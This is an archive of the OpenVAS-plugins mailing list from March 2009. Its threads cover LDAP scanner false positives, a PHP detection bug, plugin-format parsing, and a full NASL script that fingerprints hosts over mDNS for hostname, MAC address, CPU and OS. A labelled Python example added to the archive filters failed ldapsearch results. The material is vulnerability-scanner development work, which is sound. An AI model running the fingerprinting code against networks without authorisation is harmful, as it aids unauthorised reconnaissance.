From bneumann at kattare.com Tue Mar 10 21:57:33 2009
From: bneumann at kattare.com (bneumann@kattare.com)
Date: Tue, 10 Mar 2009 13:57:33 -0700
Subject: [Openvas-plugins] OpenVAS plugin for ldap
Message-ID: <20090310135733.14043rl8gdsogb40@www.kattare.com>

Hi Tarik,

Since your plugin was added to OpenVAS, all the hosts in our network (more than 700) suddenly show up with a security hole for ldap. Here is the output from an HTML page:

==================================
Vulnerability ldap (389/tcp)
The LDAPserver allows null-binds and null- base requests
OpenVAS ID : 1.3.6.1.4.1.25623.1.0.91984

Informational ldap (389/tcp)
Grabbed the following information with a null- bind, null-base request:
--------------------------------------------------------------------------------------------------
ldap_bind: Can't con
OpenVAS ID : 1.3.6.1.4.1.25623.1.0.91984

Informational ldap (389/tcp)
Grabbed the following information from the LDAP server:
----------------------------------------------------------------------------------------
ldap_bind: Can't con
OpenVAS ID : 1.3.6.1.4.1.25623.1.0.91984
===================================

I assume "Can't con" means "Cannot connect." If the plugin cannot connect then there should not be any vulnerability present. Even hosts that are firewalled and do not allow access to port 389/tcp and hosts that have port 389/tcp closed (because an ldap server is not running) show up as having this ldap vulnerability.

What am I doing wrong? How can I avoid all these false positives? I would very much appreciate your help in this matter.
Bernd Neumann
bneumann at kattare.com

From christian.edjenguele at owasp.org Tue Mar 10 13:52:48 2009
From: christian.edjenguele at owasp.org (Christian Eric Edjenguele)
Date: Tue, 10 Mar 2009 13:52:48 +0100
Subject: [Openvas-plugins] help on nasl
Message-ID: <49B662A0.7010207@owasp.org>

Hello I'm writing a nvt to fingerprint os through MDNS on windows, I got an error, see screenshot attached for details.

any suggestion ?
Thanks.

--
Christian Eric Edjenguele
IT Security Software Engineer / IT Enterprise Software Architect
Mobile (IT): +39 3408580513
PGP KeyID: 0xB1654498
Key Server: http://pgp.mit.edu

-------------- next part --------------
A non-text attachment was scrubbed...
Name: Screenshot-chrix at darkstar: ~-Workspaces-OpenVAS-trunk-openvas-plugins-scripts.png
Type: image/png
Size: 374523 bytes
Desc: not available
Url : http://lists.wald.intevation.org/pipermail/openvas-plugins/attachments/20090310/c08bc39f/-Workspaces-OpenVAS-trunk-openvas-plugins-scripts-0001.png
-------------- next part --------------
A non-text attachment was scrubbed...
Name: Screenshot-remote-detect-MDNS.nasl (~-Workspaces-OpenVAS-trunk-openvas-plugins-scripts) - VIM.png
Type: image/png
Size: 443646 bytes
Desc: not available
Url : http://lists.wald.intevation.org/pipermail/openvas-plugins/attachments/20090310/c08bc39f/Screenshot-remote-detect-MDNS.nasl-Workspaces-OpenVAS-trunk-openvas-plugins-scripts-VIM-0001.png

From kost at linux.hr Thu Mar 12 10:48:57 2009
From: kost at linux.hr (Vlatko Kosturjak)
Date: Thu, 12 Mar 2009 10:48:57 +0100
Subject: [Openvas-plugins] bug in php detection scripts
Message-ID: <49B8DA89.7000709@linux.hr>

Hello!

Imagine the following scenario. I have 5 web/http ports on a single IP address. One has PHP and it is vulnerable, but it will report all 5 http ports are prone to php vulnerability.

It's because it sets a general PHP/Version variable and I get that all http ports are vulnerable.

It would be good (and correct) to put PHP under the following hierarchy:
www//phpversion=x.x.x

Currently it is bugged and reports the non-existent vulnerabilities to other ports. Specifically
secpod_php_sec_bypass_n_file_write_vuln_900184.nasl
and
gb_php_detect.nasl

Kost

From bchandra at secpod.com Thu Mar 12 11:42:55 2009
From: bchandra at secpod.com (Chandrashekhar B)
Date: Thu, 12 Mar 2009 16:12:55 +0530
Subject: [Openvas-plugins] help on nasl
In-Reply-To: <49B662A0.7010207@owasp.org>
References: <49B662A0.7010207@owasp.org>
Message-ID: <6BCBF723D32046D09C6B551F4DF1759A@bchandra>

Christian,

What's 'X' supposed to do in ln 80? Guess, you wanted it to be '*' ?

Chandra.

From bchandra at secpod.com Thu Mar 12 11:45:07 2009
From: bchandra at secpod.com (Chandrashekhar B)
Date: Thu, 12 Mar 2009 16:15:07 +0530
Subject: [Openvas-plugins] bug in php detection scripts
In-Reply-To: <49B8DA89.7000709@linux.hr>
References: <49B8DA89.7000709@linux.hr>
Message-ID: <3FE1A4912A75412D8347EAD7D1A88FA8@bchandra>

Hello Kost,

Thanks for reporting. There's actually another KB item called "PHP/Port" set along with "PHP/Version" which is being used in some scripts and some aren't using it. We are addressing this now.

Thanks,
Chandra.

-----Original Message-----
From: openvas-plugins-bounces at wald.intevation.org [mailto:openvas-plugins-bounces at wald.intevation.org] On Behalf Of Vlatko Kosturjak
Sent: Thursday, March 12, 2009 3:19 PM
To: openvas-plugins
Subject: [Openvas-plugins] bug in php detection scripts

Hello!

Imagine the following scenario. I have 5 web/http ports on a single IP address. One has PHP and it is vulnerable, but it will report all 5 http ports are prone to php vulnerability.
It's because it sets a general PHP/Version variable and I get that all http ports are vulnerable.

It would be good (and correct) to put PHP under the following hierarchy:
www//phpversion=x.x.x

Currently it is bugged and reports the non-existent vulnerabilities to other ports. Specifically
secpod_php_sec_bypass_n_file_write_vuln_900184.nasl
and
gb_php_detect.nasl

Kost
_______________________________________________
Openvas-plugins mailing list
Openvas-plugins at wald.intevation.org
http://lists.wald.intevation.org/mailman/listinfo/openvas-plugins

From c_edjenguele at yahoo.it Thu Mar 12 12:53:08 2009
From: c_edjenguele at yahoo.it (Christian Eric EDJENGUELE)
Date: Thu, 12 Mar 2009 11:53:08 +0000 (GMT)
Subject: [Openvas-plugins] Openvas-plugins Digest, Vol 16, Issue 2
References:
Message-ID: <230891.51190.qm@web28604.mail.ukl.yahoo.com>

> Message: 2
> Date: Thu, 12 Mar 2009 16:12:55 +0530
> From: "Chandrashekhar B"
> Subject: Re: [Openvas-plugins] help on nasl
> To: ,
> Message-ID: <6BCBF723D32046D09C6B551F4DF1759A at bchandra>
> Content-Type: text/plain; charset="us-ascii"
>
> Christian,
>
> What's 'X' supposed to do in ln 80? Guess, you wanted it to be '*' ?

according to the documentation (http://www.virtualblueness.net/nasl..html#tth_sEc2.7.1) the 'x' operator must repeat the string 'x times' or not ?

> Chandra.

From bchandra at secpod.com Thu Mar 12 13:24:09 2009
From: bchandra at secpod.com (Chandrashekhar B)
Date: Thu, 12 Mar 2009 17:54:09 +0530
Subject: [Openvas-plugins] Openvas-plugins Digest, Vol 16, Issue 2
In-Reply-To: <230891.51190.qm@web28604.mail.ukl.yahoo.com>
References: <230891.51190.qm@web28604.mail.ukl.yahoo.com>
Message-ID:

That's only to call a function repeatedly. I am not sure what you are trying to do.

Chandra.

From shawnduffy at gmail.com Thu Mar 12 15:52:44 2009
From: shawnduffy at gmail.com (Shawn Duffy)
Date: Thu, 12 Mar 2009 10:52:44 -0400
Subject: [Openvas-plugins] Standardization of plugin formats
Message-ID: <49B921BC.3010707@gmail.com>

Are there any plans to enforce some sort of standard format for plugin information in plugins? I'm currently writing an app that parses the plugins for information and stores it in a database. The app, once it reaches a reasonable level of maturity, will be open source and available to anyone.

However, in trying to extract information from plugin files, I'm finding a huge variety of formats for plugin information. For example, plugin name.
There are multiple ways the name may appear in a particular plugin:

script_name("Actual name of script");
script_name(english:"Actual name of script");
script_name(english:name["english"]);
name["english"] = "Actual name of script";
name["english"] =
"Actual name of script";

The script category is another example. I thought the standard format was:

script_category(XXXXXX);

Until I saw:

script_summary(english:"XXXXXX"); script_category(XXXXXXXXXX);

Is it possible to parse this using a fairly simple RegEx? Sure. But since everyone appears to be free to add their info anyway they like, as long as it is syntactically correct in NASL, you're forced to continually check new plugins to see if some other contributed script has come up with an entirely new way to enter the info.

So, are there any plans to come up with a basic "style guide" for plugins? And reject any that aren't in the specific format? It would be nice to know that script_name, for example, will _always_ be:

name["english"] =
name["francais"] =

and so on. I think in the long run this will make OpenVAS that much more extensible and scalable. I'd even volunteer to help come up with the guidelines if necessary. Thoughts and criticisms welcome...

Thanks,
Shawn

From lists at securityspace.com Thu Mar 12 16:05:58 2009
From: lists at securityspace.com (Thomas Reinke)
Date: Thu, 12 Mar 2009 11:05:58 -0400
Subject: [Openvas-plugins] Standardization of plugin formats
In-Reply-To: <49B921BC.3010707@gmail.com>
References: <49B921BC.3010707@gmail.com>
Message-ID: <49B924D6.9000206@securityspace.com>

If you are looking at extracting information such as category, ids, etc, out of the script, you might want to consider checking the OTP protocol. It's not very complicated to connect to the server and send a syntactically correct connection request (uid/password,etc) to the server, after which it immediately dumps to you all the information available it has on each script, one line per script.

Thomas

From shawnduffy at gmail.com Thu Mar 12 16:13:50 2009
From: shawnduffy at gmail.com (Shawn Duffy)
Date: Thu, 12 Mar 2009 11:13:50 -0400
Subject: [Openvas-plugins] Standardization of plugin formats
In-Reply-To: <49B924D6.9000206@securityspace.com>
References: <49B921BC.3010707@gmail.com> <49B924D6.9000206@securityspace.com>
Message-ID: <49B926AE.5090608@gmail.com>

Thanks... I'll take a look at it.

From meyer at strato-rz.de Thu Mar 12 17:09:26 2009
From: meyer at strato-rz.de (Michael Meyer)
Date: Thu, 12 Mar 2009 17:09:26 +0100
Subject: [Openvas-plugins] Standardization of plugin formats
In-Reply-To: <49B921BC.3010707@gmail.com>
References: <49B921BC.3010707@gmail.com>
Message-ID: <20090312160926.GB22960@strato-rz.de>

*** Shawn Duffy wrote:

> Is it possible to parse this using a fairly simple RegEx? Sure. But
> since everyone appears to be free to add their info anyway they like, as
> long as it is syntactically correct in NASL, you're forced to
> continually check new plugins to see if some other contributed script
> has come up with an entirely new way to enter the info.

Throw maybe take a look at

http://cpansearch.perl.org/src/RALAMOSM/Parse-Nessus-Plugin-0.5/lib/Parse/Nessus/Plugin.pm

Maybe it's inspiring ...

Micha

From christian.edjenguele at owasp.org Thu Mar 12 21:14:35 2009
From: christian.edjenguele at owasp.org (Christian Eric Edjenguele)
Date: Thu, 12 Mar 2009 21:14:35 +0100
Subject: [Openvas-plugins] help on nasl
In-Reply-To: <6BCBF723D32046D09C6B551F4DF1759A@bchandra>
References: <49B662A0.7010207@owasp.org> <6BCBF723D32046D09C6B551F4DF1759A@bchandra>
Message-ID: <49B96D2B.90603@owasp.org>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Chandrashekhar B wrote:
> Christian,
>
> What's 'X' supposed to do in ln 80? Guess, you wanted it to be '*' ?

the 'x' must repeat 'x times' the string, according to nasl documentation
for more details please see the complete script below:

# OpenVAS Vulnerability Test
# $Id$
# Description:
# MDNS, Bonjour, zeroconf Service detection and Information Gathering
#
# remote-detect-MDNS.nasl
#
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2+,
# as published by the Free Software Foundation
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
#

if(description)
{
  script_id(101002);
  name["english"] = "Ensure the presence of the MDNS Service";
  script_name(english:name["english"]);

  desc["english"] = "
The Remote Host is Running the MDNS Service.
Zeroconf, or Zero Configuration Networking, often kwon as MDNS or Bonjour/rendez-vous,
is a set of techniques that automatically create a usable IP network without
configuration or special servers.

Solution :
It's recommanded to disable this service if not use.

Risk factor : None";

  script_description(english:desc["english"]);

  summary["english"] = "Detects the presence of the MDNS service";
  script_summary(english:summary["english"]);

  script_category(ACT_GATHER_INFO);

  script_copyright(english:"This script is Written by Christian Eric Edjenguele and released under GPL v2 or later");
  family["english"] = "Service detection";
  script_family(english:family["english"]);
  script_require_ports(5353);

  exit(0);
}

#
# The script code starts here
#

include("misc_func.inc");

#
# Functions for mdns protocol manipulation
#

function grabHostInfos(stringa)
{
  length = ord(stringa[51]) x 256 + ord(stringa[52]) - 1;
  straddr = substr(stringa, 54, 51 + length);

  pad = split(straddr, sep:"[");
  addr = str_replace(string:pad[1], find:"]", replace:"");
  na = str_replace(string:pad[0], find:"0xe20x800x99", replace:"");
  nb = str_replace(string:na, find:'\ ', replace:"-");
  n = str_replace(string:nb, find:'\'', replace:"");
  limits = max_index(n) - 1;
  name = n[limits];

  # save the mac address and hostname
  infos = make_array(0, addr, 1, name);

  return (infos);
}

function grabCpuInfos(stringa)
{
  offset = 13 + ord(stringa[12]) + 23;

  # determine the limits to extract cpu type
  cpu_len = ord(stringa[offset]);
  mn = offset + 1;
  mj = mn + cpu_len;
  cpu_type = substr(stringa , mn , mj);

  # determine the limits to extract operating system type
  offset += cpu_len + 1;
  minor = offset + 1;
  major = minor + ord(stringa[offset]);
  pados = substr(stringa , minor , major );
  os = split(pados, sep:";");
  os_x = os[0];

  # save cpu type and operating system
  infos = make_array(0, cpu_type, 1, os_x);

  return (infos);
}

function RunMDNSQuery(query, itype)
{
  if(strlen(query) != 3) return;

  pkt2 = "";
  pkt1 = "0x000x4a0x010x000x000x010x000x000x000x000x000x00";

  foreach element (query)
  {
    length = strlen(element);
    pkt1 += raw_string(length) + element;
  }

  if(itype == 'PTR') pkt1 += "0x000x000x0c0x000x01";
  if(itype == 'HINFO')
  {
    foreach element (query)
    {
      pkt1 += "0x000x0d0x000x010x00";
      return (pkt1);
    }
  }

  return (pkt1);
}

#
# NVT starts here
#

# define some local variables
port = 5353;
version = "";
qry1 = make_list('_daap', '_tcp', 'local');
qry2 = make_list('_workstation', '_tcp', 'local');

# forge the MDNS Host Infos negociation protocol
pkt1 = RunMDNSQuery(query:qry1, itype:'PTR');
pkt2 = RunMDNSQuery(query:qry2, itype:'PTR');

if(get_port_state(port))
{
  soc = open_sock_udp(port);
  if(soc)
  {
    send(socket:soc, data:pkt1);
    send(socket:soc, data:pkt2);

    reply = recv(socket:soc, length:1024);
    if(reply)
    # get host informations
    hostinfos = grabHostInfos(stringa:reply);
    qry3 = make_list(hostinfos[1], 'local', '');

    # forge the MDNS CPU Infos negociation protocol
    pkt3 = RunMDNSQuery(query:qry3, itype:'HINFO');

    send(socket:soc, data:pkt3);
    reply = recv(socket:soc, length:4096);

    # get cpu informations
    cpuinfos = grabCpuInfos(stringa:reply);

    close(soc);
  }

  # save gathered informations into variables
  mac_address = hostinfos[0];
  hostname = hostinfos[1];
  cpu_type = cpuinfos[0];
  operating_system = cpuinfos[1];

  # build report string
  report = 'Hostname: ' + hostname;
  report += ' \nMAC Address: ' + mac_address;
  report += '\nCPU Type: ' + cpu_type;
  report += '\nOperating System: ' + operating_system;

  # Save informations into the kb
  set_kb_item (name:"MDNS/Host/hostname", value:hostname);
  set_kb_item (name:"MDNS/Host/OS", value:operating_system);
  set_kb_item (name:"MDNS/Host/MacAddress", value:mac_address);
  set_kb_item (name:"MDNS/Host/CpuType", value:cpu_type);

  register_service(port:port, ipproto:"udp", proto:"mdns");

  # report MDNS service running
  security_note(port:port, data:report);
}

>
> Chandra.
>
> -----Original Message-----
> From: openvas-plugins-bounces at wald.intevation.org
> [mailto:openvas-plugins-bounces at wald.intevation.org] On Behalf Of Christian
> Eric Edjenguele
> Sent: Tuesday, March 10, 2009 6:23 PM
> To: openvas-plugins at wald.intevation.org
> Subject: [Openvas-plugins] help on nasl
>
> Hello I'm writing a nvt to fingerprint os through MDNS on windows, I got
> an error, see screenshot attached for details.
>
> any suggestion ?
> Thanks.

- --
Christian Eric Edjenguele
IT Security Software Engineer / IT Enterprise Software Architect
Mobile (IT): +39 3408580513
PGP KeyID: 0xB1654498
Key Server: http://pgp.mit.edu

From bchandra at secpod.com Fri Mar 13 07:24:29 2009
From: bchandra at secpod.com (Chandrashekhar B)
Date: Fri, 13 Mar 2009 11:54:29 +0530
Subject: [Openvas-plugins] Standardization of plugin formats
In-Reply-To: <20090312160926.GB22960@strato-rz.de>
References: <49B921BC.3010707@gmail.com> <20090312160926.GB22960@strato-rz.de>
Message-ID: <8D12BC8129FB416BB6176E5651A3830F@bchandra>

We have a NASL parser already in some format which parses most part of the
description elements and also there are some additional scripts to check the
correctness of various description elements.
Some amount of additional work is required, once we are done with that,
we'll be releasing in GPL. This will help to enforce the standards.

Thanks,
Chandra.

-----Original Message-----
From: openvas-plugins-bounces at wald.intevation.org
[mailto:openvas-plugins-bounces at wald.intevation.org] On Behalf Of Michael Meyer
Sent: Thursday, March 12, 2009 9:39 PM
To: openvas-plugins at wald.intevation.org
Subject: Re: [Openvas-plugins] Standardization of plugin formats

*** Shawn Duffy wrote:

> Is it possible to parse this using a fairly simple RegEx? Sure. But
> since everyone appears to be free to add their info anyway they like, as
> long as it is syntactically correct in NASL, you're forced to
> continually check new plugins to see if some other contributed script
> has come up with an entirely new way to enter the info.

Throw maybe take a look at

http://cpansearch.perl.org/src/RALAMOSM/Parse-Nessus-Plugin-0.5/lib/Parse/Nessus/Plugin.pm

Maybe it's inspiring ...

Micha
_______________________________________________
Openvas-plugins mailing list
Openvas-plugins at wald.intevation.org
http://lists.wald.intevation.org/mailman/listinfo/openvas-plugins

From bchandra at secpod.com Fri Mar 13 07:47:52 2009
From: bchandra at secpod.com (Chandrashekhar B)
Date: Fri, 13 Mar 2009 12:17:52 +0530
Subject: [Openvas-plugins] help on nasl
In-Reply-To: <49B96D2B.90603@owasp.org>
References: <49B662A0.7010207@owasp.org> <6BCBF723D32046D09C6B551F4DF1759A@bchandra> <49B96D2B.90603@owasp.org>
Message-ID:

Hello Christian,

I don't have mDNS setup to try.

In this line,

length = ord(stringa[51]) x 256 + ord(stringa[52]) - 1;

You are trying to get ord() and call that 256 times. This ord(stringa[51])
will not change any number of times you call. That's why I was asking what
you are trying to do in the above line.

Chandra.

From felix.wolfsteller at intevation.de Fri Mar 13 09:17:25 2009
From: felix.wolfsteller at intevation.de (Felix Wolfsteller)
Date: Fri, 13 Mar 2009 09:17:25 +0100
Subject: [Openvas-plugins] Standardization of plugin formats
In-Reply-To: <49B921BC.3010707@gmail.com>
References: <49B921BC.3010707@gmail.com>
Message-ID: <200903130917.26037.felix.wolfsteller@intevation.de>

On Thursday 12 March 2009 15:52:44 Shawn Duffy wrote:
> Are there any plans to enforce some sort of standard format for plugin
> information in plugins?
> I'm currently writing an app that parses the
> plugins for information and stores it in a database. The app, once it
> reaches a reasonable level of maturity, will be open source and
> available to anyone.

I find it's a very good idea. When do you think that this maturity level would
be reached? And which information do you want to include in the db?

> However, in trying to extract information from plugin files, I'm finding
> a huge variety of formats for plugin information. For example, plugin
> name. There are multiple ways the name may appear in a particular plugin:

> Is it possible to parse this using a fairly simple RegEx? Sure. But
> since everyone appears to be free to add their info anyway they like, as
> long as it is syntactically correct in NASL, you're forced to
> continually check new plugins to see if some other contributed script
> has come up with an entirely new way to enter the info.

I was toying around with libraries to build a dependency and include graph for
NVTs. Another idea was to visually represent knowledge base items and insert
set_kb and get_kb edges, so that it would be possible to see which plugins
access which knowledge base items.

Fairly simple regexps worked okay for that task (I got a good number of true
results), however you get a resolution problem when variables are involved.
I am not sure if that is allowed in nasl, but I guess it should be:

english_name = "NastyNameScript";
name["english"] = english_name;

And one can imagine much worse scenarios, where strings are concatenated etc.

For that reason I would advise to do what Thomas suggested: Either use
* a "fake"-client or
* the client's plugin-cache (easy to parse).

Another solution would be to use the nasl standalone interpreter
(openvas-libnasl/nasl/nasl.c) or some parts of the server component.
It is my favorite solution, because of four reasons
* I was interested in more "deep" information that is not included in the
  caches - like includes, maybe which message types are sent etc.
* One has to touch and clean up the NVT representation in code :) .
* You would not have to worry about upcoming changes to the NASL syntax.
* Probably it would be slightly easier to extract the descriptions etc for
  languages other than english.

enjoy
felix

> So, are there any plans to come up with a basic "style guide" for
> plugins? And reject any that aren't in the specific format? It would
> be nice to know that script_name, for example, will _always_ be:
>
> name["english"] =
> name["francais"] =
>
> and so on. I think in the long run this will make OpenVAS that much
> more extensible and scalable. I'd even volunteer to help come up with
> the guidelines if necessary. Thoughts and criticisms welcome...
>
> Thanks,
> Shawn
>
> _______________________________________________
> Openvas-plugins mailing list
> Openvas-plugins at wald.intevation.org
> http://lists.wald.intevation.org/mailman/listinfo/openvas-plugins

--
Felix Wolfsteller | ++49-541-335 08 3451 | http://www.intevation.de/
PGP Key: 39DE0100
Intevation GmbH, Neuer Graben 17, 49074 Osnabrück | AG Osnabrück, HR B 18998
Geschäftsführer: Frank Koormann, Bernhard Reiter, Dr. Jan-Oliver Wagner

From kost at linux.hr Fri Mar 13 09:49:56 2009
From: kost at linux.hr (Vlatko Kosturjak)
Date: Fri, 13 Mar 2009 09:49:56 +0100
Subject: [Openvas-plugins] bug in php detection scripts
In-Reply-To: <3FE1A4912A75412D8347EAD7D1A88FA8@bchandra>
References: <49B8DA89.7000709@linux.hr> <3FE1A4912A75412D8347EAD7D1A88FA8@bchandra>
Message-ID: <49BA1E34.4020301@linux.hr>

Chandrashekhar B wrote:
> Hello Kost,
>
> Thanks for reporting. There's actually another KB item called "PHP/Port" set
> along with "PHP/Version" which is being used in some scripts and some aren't
> using it. We are addressing this now.

Great. Thanks.
What about using the correct hierarchy in KB?

> It would be good (and correct) to put PHP under following hierarchy:
> www//phpversion=x.x.x

Kost

From kost at linux.hr Fri Mar 13 10:16:57 2009
From: kost at linux.hr (Vlatko Kosturjak)
Date: Fri, 13 Mar 2009 10:16:57 +0100
Subject: [Openvas-plugins] bug in php detection scripts
In-Reply-To: <49BA1E34.4020301@linux.hr>
References: <49B8DA89.7000709@linux.hr> <3FE1A4912A75412D8347EAD7D1A88FA8@bchandra> <49BA1E34.4020301@linux.hr>
Message-ID: <49BA2489.7090404@linux.hr>

Vlatko Kosturjak wrote:
> Chandrashekhar B wrote:
>> Thanks for reporting. There's actually another KB item called "PHP/Port" set
>> along with "PHP/Version" which is being used in some scripts and some aren't
>> using it. We are addressing this now.
> Great. Thanks. What about using the correct hierarchy in KB?
>> It would be good (and correct) to put PHP under following hierarchy:
>> www//phpversion=x.x.x

While we speak about this. Also, it would be good to have a general talk about
having a "Check Type:" item in every plugin output.

So, for example, this check would have the following in its output:
Check type: Remote version check.

Other types (e.g.):
Local version check
Remote vulnerability trigger
etc.

It would greatly help the tester in determining false positives.

Kost

From jan-oliver.wagner at intevation.de Fri Mar 13 12:09:52 2009
From: jan-oliver.wagner at intevation.de (Jan-Oliver Wagner)
Date: Fri, 13 Mar 2009 12:09:52 +0100
Subject: [Openvas-plugins] OpenVAS plugin for ldap
In-Reply-To: <20090310135733.14043rl8gdsogb40@www.kattare.com>
References: <20090310135733.14043rl8gdsogb40@www.kattare.com>
Message-ID: <200903131209.54930.jan-oliver.wagner@intevation.de>

Hello Bernd,

On Dienstag, 10. März 2009, bneumann at kattare.com wrote:
> Hi Tarik,

unfortunately Tarik has not been active for OpenVAS for quite a while.

> Since your plugin was added to OpenVAS, all the hosts in our network (more
> than 700) suddenly show up a security hole for ldap.

It should have been part of OpenVAS for a very long time.
Actually it should not have happened suddenly.
Or did you just execute the first scan with OpenVAS?

> here is the output from an html page:
>...
> I assume "Can't con" means "Cannot connect."

The broken string comes from ldapsearch I guess.

> If the plugin cannot connect
> then there should not be any vulnerability present. Even hosts that are
> firewalled and do not allow access to port 389/tcp and hosts that have port
> 389/tcp closed (because an ldap server is not running) show up as having this
> ldap vulnerability.
>
> What am I doing wrong? How can I avoid all these false positives? I would
> very much appreciate your help in this matter.

We will look into this.

Best

Jan

--
Dr. Jan-Oliver Wagner | ++49-541-335083-0 | http://www.intevation.de/
Intevation GmbH, Neuer Graben 17, 49074 Osnabrück | AG Osnabrück, HR B 18998
Geschäftsführer: Frank Koormann, Bernhard Reiter, Dr. Jan-Oliver Wagner

From bchandra at secpod.com Fri Mar 13 12:53:39 2009
From: bchandra at secpod.com (Chandrashekhar B)
Date: Fri, 13 Mar 2009 17:23:39 +0530
Subject: [Openvas-plugins] OpenVAS plugin for ldap
In-Reply-To: <200903131209.54930.jan-oliver.wagner@intevation.de>
References: <20090310135733.14043rl8gdsogb40@www.kattare.com> <200903131209.54930.jan-oliver.wagner@intevation.de>
Message-ID: <516BDF2EAB6A40D69F764D4487838ED1@bchandra>

I have seen the plugin, it is not doing error checking before calling to
report. Even if the pread or ldapsearch fails, it reports. We don't have
LDAP setup right now, if you can give me the error response string for a
failed ldapsearch, we could update the plugin.

Thanks,
Chandra.
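
The missing error check described in the message above, sketched as an added example: it is not the OpenVAS plugin's code (which is NASL) and was not posted by anyone in this thread. It classifies what ldapsearch printed before anything is reported, so that a failed or truncated bind such as "ldap_bind: Can't con" never becomes a finding. The function names, state labels and the rule "report only when entries came back" are assumptions of this example; the sample outputs are constructed from the ldapsearch messages quoted in this thread, plus one constructed successful reply.

```python
import re
from typing import Dict, List, NamedTuple

# Client-side failures from ldapsearch look like "ldap_bind: <message> (<code>)".
# The code group is optional so that a report field cut off mid-message
# ("ldap_bind: Can't con") is still recognised as an error.
ERROR_LINE = re.compile(r"^(ldap_\w+): *(.*?)(?: \((-?\d+)\))?$", re.MULTILINE)
RESULT_LINE = re.compile(r"^result: (\d+)", re.MULTILINE)   # LDIF trailer
ENTRY_LINE = re.compile(r"^dn:", re.MULTILINE)              # one per returned entry


class Verdict(NamedTuple):
    state: str    # "no_output", "error", "unparsed", "no_data", "data_returned"
    report: bool  # True only when the server really disclosed entries
    detail: str


def classify_ldapsearch(output: str) -> Verdict:
    """Decide from ldapsearch's text output whether there is anything to report."""
    text = output.strip()
    if not text:
        return Verdict("no_output", False, "ldapsearch printed nothing")

    err = ERROR_LINE.search(text)
    if err:
        func, msg, code = err.groups()
        suffix = f" (code {code})" if code else " (no result code, output truncated?)"
        return Verdict("error", False, f"{func} failed: {msg}{suffix}")

    res = RESULT_LINE.search(text)
    if res is None:
        return Verdict("unparsed", False, "neither an ldap_* error nor a result line")

    code = int(res.group(1))
    entries = len(ENTRY_LINE.findall(text))
    if code == 0 and entries > 0:
        return Verdict("data_returned", True,
                       f"{entries} entry/entries readable without credentials")
    return Verdict("no_data", False,
                   f"search ended with result {code} and {entries} entries")


def reportable_hosts(outputs: Dict[str, str]) -> List[str]:
    """Return only the hosts whose output justifies a finding."""
    return sorted(h for h, out in outputs.items() if classify_ldapsearch(out).report)


# Constructed sample outputs, keyed by documentation-range addresses.
UNREACHABLE = "ldap_bind: Can't contact LDAP server (-1)\n"
TRUNCATED = "ldap_bind: Can't con"
REFUSED = ("ldap_bind: Server is unwilling to perform (53)\n"
           "\tadditional info: unauthenticated bind (DN with no password) disallowed\n")
NO_OBJECT = ("# extended LDIF\n#\n# LDAPv3\n# base <> with scope subtree\n"
             "# filter: (objectclass=*)\n# requesting: ALL\n#\n\n"
             "# search result\nsearch: 2\nresult: 32 No such object\n\n"
             "# numResponses: 1\n")
ROOT_DSE = ("# extended LDIF\n#\n# LDAPv3\n#\n\n#\ndn:\n"
            "namingContexts: dc=example,dc=org\n\n"
            "# search result\nsearch: 2\nresult: 0 Success\n\n"
            "# numResponses: 2\n# numEntries: 1\n")

SAMPLE_OUTPUTS = {
    "192.0.2.10": UNREACHABLE,   # port closed or filtered
    "192.0.2.11": TRUNCATED,     # report field cut off after a few bytes
    "192.0.2.12": REFUSED,       # server rejects the bind
    "192.0.2.13": NO_OBJECT,     # bind accepted, nothing returned
    "192.0.2.14": ROOT_DSE,      # bind accepted, entry returned
    "192.0.2.15": "",            # command produced no output
}

if __name__ == "__main__":
    for host, out in sorted(SAMPLE_OUTPUTS.items()):
        v = classify_ldapsearch(out)
        print(f"{host}: {v.state:13} report={v.report}  {v.detail}")
```

LDIF comment lines start with "#" and LDAP attribute names cannot contain an underscore, so a line beginning with "ldap_" in this output can only come from the client library's error reporting.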

-----Original Message-----
From: openvas-plugins-bounces at wald.intevation.org
[mailto:openvas-plugins-bounces at wald.intevation.org] On Behalf Of Jan-Oliver Wagner
Sent: Friday, March 13, 2009 4:40 PM
To: openvas-plugins at wald.intevation.org
Subject: Re: [Openvas-plugins] OpenVAS plugin for ldap

Hello Bernd,

On Dienstag, 10. März 2009, bneumann at kattare.com wrote:
> Hi Tarik,

unfortunately Tarik has not been active for OpenVAS for quite a while.

> Since your plugin was added to OpenVAS, all the hosts in our network (more
> than 700) suddenly show up a security hole for ldap.

It should have been part of OpenVAS for a very long time.
Actually it should not have happened suddenly.
Or did you just execute the first scan with OpenVAS?

> here is the output from an html page:
>...
> I assume "Can't con" means "Cannot connect."

The broken string comes from ldapsearch I guess.

> If the plugin cannot connect
> then there should not be any vulnerability present. Even hosts that are
> firewalled and do not allow access to port 389/tcp and hosts that have port
> 389/tcp closed (because an ldap server is not running) show up as having this
> ldap vulnerability.
>
> What am I doing wrong? How can I avoid all these false positives? I would
> very much appreciate your help in this matter.

We will look into this.

Best

Jan

--
Dr. Jan-Oliver Wagner | ++49-541-335083-0 | http://www.intevation.de/
Intevation GmbH, Neuer Graben 17, 49074 Osnabrück | AG Osnabrück, HR B 18998
Geschäftsführer: Frank Koormann, Bernhard Reiter, Dr. Jan-Oliver Wagner
_______________________________________________
Openvas-plugins mailing list
Openvas-plugins at wald.intevation.org
http://lists.wald.intevation.org/mailman/listinfo/openvas-plugins

From shawnduffy at gmail.com Fri Mar 13 13:52:26 2009
From: shawnduffy at gmail.com (Shawn Duffy)
Date: Fri, 13 Mar 2009 08:52:26 -0400
Subject: [Openvas-plugins] Standardization of plugin formats
In-Reply-To: <200903130917.26037.felix.wolfsteller@intevation.de>
References: <49B921BC.3010707@gmail.com> <200903130917.26037.felix.wolfsteller@intevation.de>
Message-ID: <49BA570A.1050800@gmail.com>

Felix Wolfsteller wrote:
> I find it's a very good idea. When do you think that this maturity level would
> be reached? And which information do you want to include in the db?
>

I'm hoping I'll have a beta release within a few months. As for what's
included in the DB, it's not yet certain. But right now, I wanted to be
able to grab and store ID, name, summary, and family/category. This
would be helpful in being able to generate .openvasrc files and making
them human-readable.

Based on someone else's suggestion, I just wrote a rudimentary client
in PHP so I could just extract the information directly from the OpenVAS
server. This information is more reliable and more easily parseable.
